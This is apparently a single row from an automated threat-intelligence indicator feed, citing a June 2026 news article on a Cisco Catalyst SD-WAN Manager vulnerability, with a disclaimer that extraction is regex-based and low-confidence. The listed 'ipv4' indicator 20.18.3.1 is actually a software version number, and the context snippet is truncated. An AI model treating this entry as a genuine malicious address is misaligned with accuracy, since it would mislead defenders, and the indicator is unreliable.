| ipv4 | 20.18.3.1 | 0.15.5.2 and earlier (Fixed in 20.15.5.3) 20.18.3 (Fixed in 20.18.3.1) 26.1.1.1 and earlier (Fixed in 26.1.1.2) Found this articl | Cisco Catalyst SD-WAN Manager CVE-2026 The Hacker News | · Jun 25, 2026 |
Extraction is regex-based (SHA-256/SHA-1/MD5, public IPv4, defanged hxxp/[.] indicators, and bare domains/emails only from malware, actor, exploit, phishing, ransomware and breach articles with a nearby indicator context word). Treat confidence as low until you verify against the source article.